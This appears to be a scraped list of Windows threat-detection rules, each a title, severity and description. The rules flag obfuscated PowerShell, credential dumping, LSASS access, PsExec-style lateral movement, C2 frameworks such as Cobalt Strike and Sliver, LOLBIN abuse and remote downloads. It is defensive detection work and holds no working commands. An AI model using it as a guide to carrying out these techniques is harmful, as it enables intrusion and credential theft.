Invoke-Obfuscation Via Stdin - SystemhighDetects Obfuscated Powershell via Stdin in Scripts
Invoke-Obfuscation RUNDLL LAUNCHER - SystemmediumDetects Obfuscated Powershell via RUNDLL LAUNCHER
Invoke-Obfuscation Via Use Clip - SystemhighDetects Obfuscated Powershell via use Clip.exe in Scripts
Invoke-Obfuscation Via Use MSHTA - SystemhighDetects Obfuscated Powershell via use MSHTA in Scripts
Invoke-Obfuscation Via Use Rundll32 - SystemhighDetects Obfuscated Powershell via use Rundll32 in Scripts
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - SystemhighDetects Obfuscated Powershell via VAR++ LAUNCHER
Credential Dumping Tools Service Execution - SystemhighDetects well-known credential dumping tools execution via service execution events
PowerShell Scripts Installed as ServiceshighDetects powershell script installed as a Service
CSExec Service InstallationmediumDetects CSExec service installation and execution events
HackTool Service Registration or ExecutionhighDetects installation or execution of services
PAExec Service InstallationmediumDetects PAExec service installation
ProcessHacker Privilege ElevationhighDetects a ProcessHacker tool that elevated privileges to a very high level
RemCom Service InstallationmediumDetects RemCom service installation and execution events
Sliver C2 Default Service InstallationhighDetects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands
PsExec Service InstallationmediumDetects PsExec service installation and execution events
PSExec and WMI Process Creations BlockhighDetects blocking of process creations originating from PSExec and WMI commands
Windows Defender AMSI Trigger DetectedhighDetects triggering of AMSI by Windows Defender.
Windows Defender Threat DetectedhighDetects actions taken by Windows Defender malware detection engines
HackTool - CACTUSTORCH Remote Thread CreationhighDetects remote thread creation from CACTUSTORCH as described in references.
Remote Thread Creation Via PowerShell In Uncommon TargetmediumDetects the creation of a remote thread from a Powershell process in an uncommon target process
DNS Query Request By Regsvr32.EXEmediumDetects DNS queries initiated by "Regsvr32.exe"
Assembly DLL Creation Via AspNetCompilermediumDetects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.
BloodHound Collection FileshighDetects default file names outputted by the BloodHound collection tool SharpHound
WScript or CScript Dropper - FilehighDetects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe
CSExec Service File CreationmediumDetects default CSExec service filename which indicates CSExec service installation and execution
Adwind RAT / JRAT File ArtifacthighDetects javaw.exe in AppData folder as used by Adwind / JRAT
Suspicious File Creation In Uncommon AppData FolderhighDetects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs
PCRE.NET Package Temp FileshighDetects processes creating temp files related to PCRE.NET package
File With Uncommon Extension Created By An Office ApplicationhighDetects the creation of files with an executable or script extension by an Office application.
Suspicious File Created In PerfLogsmediumDetects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files
Malicious PowerShell Scripts - FileCreationhighDetects the creation of known offensive powershell scripts used for exploitation
RemCom Service File CreationmediumDetects default RemCom service filename which indicates RemCom service installation and execution
Remote Access Tool - ScreenConnect Temporary FilelowDetects the creation of files in a specific location by ScreenConnect RMM. ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution.
Windows Shell/Scripting Application File Write to Suspicious FolderhighDetects Windows shells and scripting applications that write files to suspicious folders
Created Files by Microsoft Sync CentermediumThis rule detects suspicious files created by Microsoft Sync Center (mobsync)
Potential File Extension Spoofing Using Right-to-Left OverridehighDetects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions.
Suspicious Scheduled Task Write to System32 TaskshighDetects the creation of tasks from processes executed from suspicious locations
Suspicious Interactive PowerShell as SYSTEMhighDetects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context
WinSxS Executable File Creation By Non-System ProcessmediumDetects the creation of binaries in the WinSxS folder by non-system processes
PsExec Service File CreationlowDetects default PsExec service filename which indicates PsExec service installation and execution
PSEXEC Remote Execution File ArtefacthighDetects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
UAC Bypass Using IDiagnostic Profile - FilehighDetects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
Wmiprvse Wbemcomn DLL Hijack - FilecriticalDetects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
PCRE.NET Package Image LoadhighDetects processes loading modules related to PCRE.NET package
PowerShell Core DLL Loaded By Non PowerShell ProcessmediumDetects loading of essential DLLs used by PowerShell by non-PowerShell process. Detects behavior similar to meterpreter's "load powershell" extension.
CLR DLL Loaded Via Office ApplicationsmediumDetects CLR DLL being loaded by an Office Product
DotNET Assembly DLL Loaded Via Office ApplicationmediumDetects any assembly DLL being loaded by an Office Product
Active Directory Parsing DLL Loaded Via Office ApplicationmediumDetects DSParse DLL being loaded by an Office Product
GAC DLL Loaded Via Office ApplicationshighDetects any GAC DLL being loaded by an Office Product
Microsoft Excel Add-In Loaded From Uncommon LocationmediumDetects Microsoft Excel loading an Add-In (.xll) file from an uncommon location
Active Directory Kerberos DLL Loaded Via Office ApplicationmediumDetects Kerberos DLL being loaded by an Office Product
Microsoft VBA For Outlook Addin Loaded Via OutlookmediumDetects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process
VBA DLL Loaded Via Office ApplicationhighDetects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.
Remote DLL Load Via Rundll32.EXEmediumDetects a remote DLL load event via "rundll32.exe".
Abusable DLL Potential Sideloading From Suspicious LocationhighDetects potential DLL sideloading of DLLs that are known to be abused from suspicious locations
DotNet CLR DLL Loaded By Scripting ApplicationshighDetects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.
Wmiprvse Wbemcomn DLL HijackhighDetects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
Suspicious WSMAN Provider Image LoadsmediumDetects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
Outbound Network Connection Initiated By Microsoft DialerhighDetects outbound network connection initiated by Microsoft Dialer. The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer. This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys"
Network Connection Initiated By Eqnedt32.EXEhighDetects network connections from the Equation Editor process "eqnedt32.exe".
Network Connection Initiated Via Notepad.EXEhighDetects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates a network communication except when printing documents for example.
Office Application Initiated Network Connection To Non-Local IPmediumDetects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses. This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292. This rule will require an initial baseline and tuning that is specific to your organization.
Silenttrinity Stager Msbuild ActivityhighDetects a possible remote connections to Silenttrinity c2
Network Connection Initiated By Regsvr32.EXEmediumDetects a network connection initiated by "Regsvr32.exe"
Microsoft Sync Center Suspicious Network ConnectionsmediumDetects suspicious connections from Microsoft Sync Center to non-private IPs.
Rundll32 Internet ConnectionmediumDetects a rundll32 that communicates with public IP addresses
Potential Remote PowerShell Session InitiatedhighDetects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account. This could potentially indicates a remote PowerShell connection.
Outbound Network Connection To Public IP Via WinlogonmediumDetects a "winlogon.exe" process that initiate network communications with public IP addresses
Alternate PowerShell Hosts PipemediumDetects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
New PowerShell Instance CreatedinformationalDetects the execution of PowerShell via the creation of a named pipe starting with PSHost
PUA - CSExec Default Named PipemediumDetects default CSExec pipe creation
PUA - PAExec Default Named PipemediumDetects PAExec default named pipe
PUA - RemCom Default Named PipemediumDetects default RemCom pipe creation
WMI Event Consumer Created Named PipemediumDetects the WMI Event Consumer service scrcons.exe creating a named pipe
Nslookup PowerShell Download CradlemediumDetects a powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records.
PsExec Tool Execution From Suspicious Locations - PipeNamemediumDetects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack
PowerShell Downgrade Attack - PowerShellmediumDetects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
PowerShell Called from an Executable Version MismatchhighDetects PowerShell called from an executable by the version mismatch method
Remote PowerShell Session (PS Classic)lowDetects remote PowerShell sessions
Renamed Powershell Under Powershell ChannellowDetects a renamed Powershell execution, which is a common technique used to circumvent security controls and bypass detection logic that's dependent on process names and process paths.
Suspicious PowerShell DownloadmediumDetects suspicious PowerShell download command
Suspicious Non PowerShell WSMAN COM ProvidermediumDetects suspicious use of the WSMAN provider without PowerShell.exe as the host application.
Alternate PowerShell Hosts - PowerShell ModulemediumDetects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
Bad Opsec Powershell Code Artifactscriticalfocuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads that often undergo minimal changes by attackers due to bad opsec.
Malicious PowerShell Scripts - PoshModulehighDetects the execution of known offensive powershell scripts used for exploitation or reconnaissance
Invoke-Obfuscation CLIP+ Launcher - PowerShell ModulehighDetects Obfuscated use of Clip.exe to execute PowerShell
Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell ModulehighDetects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below
Invoke-Obfuscation STDIN+ Launcher - PowerShell ModulehighDetects Obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ Launcher - PowerShell ModulehighDetects Obfuscated use of Environment Variables to execute PowerShell
Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell ModulemediumDetects Obfuscated Powershell via COMPRESS OBFUSCATION
Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell ModulemediumDetects Obfuscated Powershell via RUNDLL LAUNCHER
Invoke-Obfuscation Via Stdin - PowerShell ModulehighDetects Obfuscated Powershell via Stdin in Scripts
Invoke-Obfuscation Via Use MSHTA - PowerShell ModulehighDetects Obfuscated Powershell via use MSHTA in Scripts
Invoke-Obfuscation Via Use Clip - PowerShell ModulehighDetects Obfuscated Powershell via use Clip.exe in Scripts
Invoke-Obfuscation Via Use Rundll32 - PowerShell ModulehighDetects Obfuscated Powershell via use Rundll32 in Scripts
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell ModulehighDetects Obfuscated Powershell via VAR++ LAUNCHER
Malicious PowerShell Commandlets - PoshModulehighDetects Commandlet names from well-known PowerShell exploitation frameworks
Remote PowerShell Session (PS Module)highDetects remote PowerShell sessions
Suspicious PowerShell Download - PoshModulemediumDetects suspicious PowerShell download command
Suspicious PowerShell Invocations - Generic - PowerShell ModulehighDetects suspicious PowerShell invocation command parameters
Suspicious PowerShell Invocations - Specific - PowerShell ModulehighDetects suspicious PowerShell invocation command parameters
AADInternals PowerShell Cmdlets Execution - PsScripthighDetects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
Add Windows Capability Via PowerShell ScriptmediumDetects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.
PowerShell ADRecon ExecutionhighDetects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7
AMSI Bypass Pattern Assembly GetTypehighDetects code fragments found in small and obfuscated AMSI bypass PowerShell scripts
Silence.EDA DetectioncriticalDetects Silence EmpireDNSAgent as described in the Group-IP report
PowerShell Create Local UsermediumDetects creation of a local user via PowerShell
DSInternals Suspicious PowerShell Cmdlets - ScriptBlockhighDetects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
HackTool - WinPwn Execution - ScriptBlockhighDetects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
Import PowerShell Modules From Suspicious DirectoriesmediumDetects powershell scripts that import modules from suspicious directories
Invoke-Obfuscation CLIP+ Launcher - PowerShellhighDetects Obfuscated use of Clip.exe to execute PowerShell
Invoke-Obfuscation Obfuscated IEX Invocation - PowerShellhighDetects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014
Invoke-Obfuscation STDIN+ Launcher - PowershellhighDetects Obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ Launcher - PowerShellhighDetects Obfuscated use of Environment Variables to execute PowerShell
Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShellmediumDetects Obfuscated Powershell via COMPRESS OBFUSCATION
Invoke-Obfuscation RUNDLL LAUNCHER - PowerShellmediumDetects Obfuscated Powershell via RUNDLL LAUNCHER
Invoke-Obfuscation Via Stdin - PowershellhighDetects Obfuscated Powershell via Stdin in Scripts
Invoke-Obfuscation Via Use Clip - PowershellhighDetects Obfuscated Powershell via use Clip.exe in Scripts
Invoke-Obfuscation Via Use MSHTA - PowerShellhighDetects Obfuscated Powershell via use MSHTA in Scripts
Invoke-Obfuscation Via Use Rundll32 - PowerShellhighDetects Obfuscated Powershell via use Rundll32 in Scripts
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShellhighDetects Obfuscated Powershell via VAR++ LAUNCHER
Malicious PowerShell Commandlets - ScriptBlockhighDetects Commandlet names from well-known PowerShell exploitation frameworks
Malicious PowerShell KeywordsmediumDetects keywords from well-known PowerShell exploitation frameworks
Powershell MsXml COM ObjectmediumAdversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code
Malicious Nishang PowerShell CommandletshighDetects Commandlet names and arguments from the Nishang exploitation framework
NTFS Alternate Data StreamhighDetects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.
PowerView PowerShell Cmdlets - ScriptBlockhighDetects Cmdlet names from PowerView of the PowerSploit exploitation framework.
PowerShell Credential PrompthighDetects PowerShell calling a credential prompt
PSAsyncShell - Asynchronous TCP Reverse ShellhighDetects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell
PowerShell PSAttackhighDetects the use of PSAttack PowerShell hack tool
PowerShell Remote Session CreationmediumAdversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system
Change PowerShell Policies to an Insecure Level - PowerShellmediumDetects changing the PowerShell script execution policy to a potentially insecure level using the "Set-ExecutionPolicy" cmdlet.
PowerShell ShellCodehighDetects Base64 encoded Shellcode
Malicious ShellIntel PowerShell CommandletshighDetects Commandlet names from ShellIntel exploitation scripts.
Potential PowerShell Obfuscation Using Character JoinlowDetects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation
Suspicious PowerShell Download - Powershell ScriptmediumDetects suspicious PowerShell download command
Powershell Execute Batch ScriptmediumAdversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system
Suspicious PowerShell Invocations - GenerichighDetects suspicious PowerShell invocation command parameters
Suspicious PowerShell Invocations - SpecifichighDetects suspicious PowerShell invocation command parameters
Potential Suspicious PowerShell KeywordsmediumDetects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework
Potential PowerShell Obfuscation Using Alias CmdletslowDetects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts
Usage Of Web Request Commands And Cmdlets - ScriptBlockmediumDetects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs
Potential WinAPI Calls Via PowerShell ScriptshighDetects use of WinAPI functions in PowerShell scripts
Windows Defender Exclusions Added - PowerShellmediumDetects modifications to the Windows Defender configuration settings using PowerShell to add exclusions
WMImplant Hack ToolhighDetects parameters used by WMImplant
WMIC Unquoted Services Path Lookup - PowerShellmediumDetects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts
Powershell XML Execute CommandmediumAdversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code
CMSTP Execution Process AccesshighDetects various indicators of Microsoft Connection Manager Profile Installer execution
HackTool - CobaltStrike BOF Injection PatternhighDetects a typical pattern of a CobaltStrike BOF which inject into other processes
HackTool - LittleCorporal Generated Maldoc InjectionhighDetects the process injection of a LittleCorporal generated Maldoc.
HackTool - HandleKatz Duplicating LSASS HandlehighDetects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles
Remote LSASS Process Access Through Windows Remote ManagementhighDetects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.
Potential Direct Syscall of NtOpenProcessmediumDetects potential calls to NtOpenProcess directly from NTDLL.
Potential DLL Injection Via AccCheckConsolemediumDetects the execution "AccCheckConsole" a command-line tool for verifying the accessibility implementation of an application's UI. One of the tests that this checker can run are called "verification routine", which tests for things like Consistency, Navigation, etc. The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility.
Potential Adplus.EXE AbusehighDetects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.
Uncommon Child Process Of Appvlp.EXEmediumDetects uncommon child processes of Appvlp.EXE Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder or to mark a file as a system file.
Data Export From MSSQL Table Via BCP.EXEmediumDetects the execution of the BCP utility in order to export data from the database. Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file.
Suspicious Child Process Of BgInfo.EXEhighDetects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
Uncommon Child Process Of BgInfo.EXEmediumDetects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
Chromium Browser Headless Execution To Mockbin Like SitehighDetects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).
Potential Binary Proxy Execution Via Cdb.EXEmediumDetects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file
File Download From IP Based URL Via CertOC.EXEhighDetects when a user downloads a file from an IP based URL using CertOC.exe
Potential Arbitrary File Download Via Cmdl32.EXEmediumDetects execution of Cmdl32 with the "/vpn" and "/lan" flags. Attackers can abuse this utility in order to download arbitrary files via a configuration file. Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
Potential Dosfuscation ActivitymediumDetects possible payload obfuscation via the commandline
Command Line Execution with Suspicious URL and AppData StringsmediumDetects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
Suspicious File Execution From Internet Hosted WebDav SharehighDetects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files
Cmd.EXE Missing Space Characters Execution AnomalyhighDetects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe. This could be a sign of obfuscation of a fat finger problem (typo by the developer).
Potential CommandLine Path Traversal Via Cmd.EXEhighDetects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking
Read Contents From Stdin Via Cmd.EXEmediumDetect the use of "<" to read and potentially execute a file via cmd.exe
Unusual Parent Process For Cmd.EXEmediumDetects suspicious parent process for cmd.exe
CMSTP Execution Process CreationhighDetects various indicators of Microsoft Connection Manager Profile Installer execution
Conhost.exe CommandLine Path Traversalhighdetects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking
Conhost Spawned By Uncommon Parent ProcessmediumDetects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.
Control Panel ItemshighDetects the malicious use of a control panel item
Csc.EXE Execution Form Potentially Suspicious ParenthighDetects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
Suspicious Csi.exe UsagemediumCsi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'
Suspicious Use of CSharp Interactive ConsolehighDetects the execution of CSharp interactive console by PowerShell
Potential Cookies Session HijackingmediumDetects execution of "curl.exe" with the "-c" flag in order to save cookie data.
Curl Web Request With Potential Custom User-AgentmediumDetects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings
File Download From IP URL Via Curl.EXEmediumDetects file downloads directly from IP address URL using curl.exe
Suspicious File Download From IP Via Curl.EXEhighDetects potentially suspicious file downloads directly from IP addresses using curl.exe
Suspicious File Download From File Sharing Domain Via Curl.EXEhighDetects potentially suspicious file download from file sharing domains using curl.exe
Insecure Transfer Via Curl.EXEmediumDetects execution of "curl.exe" with the "--insecure" flag.
Insecure Proxy/DOH Transfer Via Curl.EXEmediumDetects execution of "curl.exe" with the "insecure" flag over proxy or DOH.
Local File Read Using Curl.EXEmediumDetects execution of "curl.exe" with the "file://" protocol handler in order to read local files.
Uncommon Child Process Of Defaultpack.EXEmediumDetects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs
Potentially Suspicious Child Process Of ClickOnce ApplicationmediumDetects potentially suspicious child processes of a ClickOnce deployment application
Arbitrary MSI Download Via Devinit.EXEmediumDetects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
Potential Discovery Activity Via Dnscmd.EXEmediumDetects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.
Binary Proxy Execution Via Dotnet-Trace.EXEmediumDetects commandline arguments for executing a child process via dotnet-trace.exe
Forfiles Command ExecutionmediumDetects the execution of "forfiles" with the "/c" flag. While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. Can be used to bypass application whitelisting.
Use of FSharp InterpretersmediumDetects the execution of FSharp Interpreters "FsiAnyCpu.exe" and "FSi.exe" Both can be used for AWL bypass and to execute F# code via scripts or inline.
Fsutil Behavior Set SymlinkEvaluationmediumA symbolic link is a type of file that contains a reference to another file. This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt
Potential Arbitrary Command Execution Via FTP.EXEmediumDetects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe".
File Decryption Using Gpg4winmediumDetects usage of Gpg4win to decrypt files
File Encryption Using Gpg4winmediumDetects usage of Gpg4win to encrypt files
File Encryption/Decryption Via Gpg4win From Suspicious LocationshighDetects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations.
Arbitrary Binary Execution Using GUP UtilitymediumDetects execution of the Notepad++ updater (gup) to launch other commands or executables
HTML Help HH.EXE Suspicious Child ProcesshighDetects a suspicious child process of a Microsoft HTML Help (HH.exe)
Suspicious HH.EXE ExecutionhighDetects a suspicious execution of a Microsoft HTML Help (HH.exe)
HackTool - Bloodhound/Sharphound ExecutionhighDetects command line parameters used by Bloodhound and Sharphound hack tools
Operator Bloopers Cobalt Strike CommandshighDetects use of Cobalt Strike commands accidentally entered in the CMD shell
Operator Bloopers Cobalt Strike ModuleshighDetects Cobalt Strike module/commands accidentally entered in CMD shell
Potential CobaltStrike Process PatternshighDetects potential process patterns related to Cobalt Strike beacon activity
HackTool - Covenant PowerShell LauncherhighDetects suspicious command lines used in Covenant luanchers
HackTool - CrackMapExec ExecutionhighThis rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
HackTool - CrackMapExec Execution PatternshighDetects various execution patterns of the CrackMapExec pentesting framework
HackTool - CrackMapExec PowerShell ObfuscationhighThe CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
HackTool - Empire PowerShell Launch ParametershighDetects suspicious powershell command line parameters used in Empire
HackTool - Potential Impacket Lateral Movement ActivityhighDetects wmiexec/dcomexec/atexec/smbexec from Impacket framework
HackTool - Impacket Tools ExecutionhighDetects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)
Invoke-Obfuscation COMPRESS OBFUSCATIONmediumDetects Obfuscated Powershell via COMPRESS OBFUSCATION
Invoke-Obfuscation CLIP+ LauncherhighDetects Obfuscated use of Clip.exe to execute PowerShell
Invoke-Obfuscation Obfuscated IEX InvocationhighDetects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block
Invoke-Obfuscation STDIN+ LauncherhighDetects Obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ LauncherhighDetects Obfuscated use of Environment Variables to execute PowerShell
Invoke-Obfuscation Via StdinhighDetects Obfuscated Powershell via Stdin in Scripts
Invoke-Obfuscation Via Use CliphighDetects Obfuscated Powershell via use Clip.exe in Scripts
Invoke-Obfuscation Via Use MSHTAhighDetects Obfuscated Powershell via use MSHTA in Scripts
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATIONhighDetects Obfuscated Powershell via VAR++ LAUNCHER
HackTool - Jlaive In-Memory Assembly ExecutionmediumDetects the use of Jlaive to execute assemblies in a copied PowerShell
HackTool - Koadic ExecutionhighDetects command line parameters used by Koadic hack tool
HackTool - PCHunter ExecutionhighDetects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff
HackTool - Default PowerSploit/Empire Scheduled Task CreationhighDetects the creation of a schtask via PowerSploit or Empire Default Configuration.
HackTool - RedMimicry Winnti Playbook ExecutionhighDetects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility
Potential SMB Relay Attack Tool ExecutioncriticalDetects different hacktools used for relay attacks on Windows for privilege escalation
HackTool - SharpWSUS/WSUSpendu ExecutionhighDetects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS. Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.
HackTool - Sliver C2 Implant Activity PatterncriticalDetects process activity patterns as seen being used by Sliver C2 framework implants
HackTool - Stracciatella ExecutionhighDetects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.
HackTool - WinPwn ExecutionhighDetects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
Suspicious ZipExec ExecutionmediumZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
Suspicious HWP Sub ProcesseshighDetects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
ImagingDevices Unusual Parent/Child ProcesseshighDetects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity
Arbitrary File Download Via IMEWDBLD.EXEhighDetects usage of "IMEWDBLD.exe" to download arbitrary files
Java Running with Remote DebuggingmediumDetects a JAVA process running with remote debugging allowing more than just localhost to connect
Computer Password Change Via Ksetup.EXEmediumDetects password change for the computer's domain account or host principal via "ksetup.exe"
Potentially Suspicious Child Process of KeyScrambler.exemediumDetects potentially suspicious child processes of KeyScrambler.exe
Logged-On User Password Change Via Ksetup.EXEmediumDetects password change for the logged-on user's via "ksetup.exe"
Rebuild Performance Counter Values Via Lodctr.EXEmediumDetects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions.
Potential Reconnaissance Activity Via GatherNetworkInfo.VBSmediumDetects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
MpiExec LolbinhighDetects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary
Execute MSDT Via Answer FilehighDetects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab)
Use of OpenConsolemediumDetects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting
Use of Pcalua For ExecutionmediumDetects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.
Indirect Command Execution By Program Compatibility WizardlowDetect indirect command execution via Program Compatibility Assistant pcwrun.exe
Execute Pcwrun.EXE To Leverage FollinahighDetects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability
Execute Code with Pester.bat as ParentmediumDetects code execution via Pester.bat (Pester - Powershell Modulte for testing)
Execute Code with Pester.batmediumDetects code execution via Pester.bat (Pester - Powershell Modulte for testing)
Suspicious Runscripthelper.exemediumDetects execution of powershell scripts via Runscripthelper.exe
Use of Scriptrunner.exemediumThe "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting
